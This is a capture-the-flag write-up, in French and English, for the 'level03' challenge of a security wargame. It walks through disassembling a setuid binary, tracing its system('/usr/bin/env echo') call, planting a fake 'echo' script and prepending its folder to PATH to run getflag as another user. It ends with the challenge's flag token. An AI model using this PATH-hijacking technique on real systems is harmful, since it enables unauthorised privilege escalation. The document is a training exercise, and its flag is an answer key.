#ls -l
-rwsr-sr-x 1 flag03 level03 8627 Mar  5  2016 level03
s: the setuid bit means the programm will be executed with the userid of its owner
Donc ici l'executable sera execute en tant que flag03

appartient a flag03 mais nous pouvons l'executer
#./level03
Exploit me

'exploit binary file'
#install gdb
#scp -P 4242 level03@10.0.2.4:/home/user/level03/level03 . (copie le binaire)
#gdb level03
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x080484a4 <+0>:     push   ebp
   0x080484a5 <+1>:     mov    ebp,esp
   0x080484a7 <+3>:     and    esp,0xfffffff0
   0x080484aa <+6>:     sub    esp,0x20
   0x080484ad <+9>:     call   0x80483a0 <getegid@plt>
   0x080484b2 <+14>:    mov    DWORD PTR [esp+0x18],eax
   0x080484b6 <+18>:    call   0x8048390 <geteuid@plt>
   0x080484bb <+23>:    mov    DWORD PTR [esp+0x1c],eax
   0x080484bf <+27>:    mov    eax,DWORD PTR [esp+0x18]
   0x080484c3 <+31>:    mov    DWORD PTR [esp+0x8],eax
   0x080484c7 <+35>:    mov    eax,DWORD PTR [esp+0x18]
   0x080484cb <+39>:    mov    DWORD PTR [esp+0x4],eax
   0x080484cf <+43>:    mov    eax,DWORD PTR [esp+0x18]
   0x080484d3 <+47>:    mov    DWORD PTR [esp],eax
   0x080484d6 <+50>:    call   0x80483e0 <setresgid@plt>
   0x080484db <+55>:    mov    eax,DWORD PTR [esp+0x1c]
   0x080484df <+59>:    mov    DWORD PTR [esp+0x8],eax
   0x080484e3 <+63>:    mov    eax,DWORD PTR [esp+0x1c]
   0x080484e7 <+67>:    mov    DWORD PTR [esp+0x4],eax
   0x080484eb <+71>:    mov    eax,DWORD PTR [esp+0x1c]
   0x080484ef <+75>:    mov    DWORD PTR [esp],eax
   0x080484f2 <+78>:    call   0x8048380 <setresuid@plt>
   0x080484f7 <+83>:    mov    DWORD PTR [esp],0x80485e0
   0x080484fe <+90>:    call   0x80483b0 <system@plt>
   0x08048503 <+95>:    leave 

On sait qu'on utilise system mais on ne sais pas quelle commande est executee

#ltrace ./level03 
__libc_start_main(0x80484a4, 1, 0xbffff7f4, 0x8048510, 0x8048580 <unfinished ...>
getegid()                                         = 2003
geteuid()                                         = 2003
setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me"Exploit me
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                            = 0
+++ exited (status 0) +++

- system("/usr/bin/env echo Exploit me")  : execute la commande echo en allant chercher le binaire echo dans les paths de l'env

On veut remplacer le binaire echo par l'execution de getflag

#chmod 777 . (pour s'attribuer les droit de creer un executable)

creer echo file 
"#!/bin/bash
getflag"

#export PATH=/home/user/level03:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games (ajout de notre path en premier pour qu'il lise notre echo)

#./level03 
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
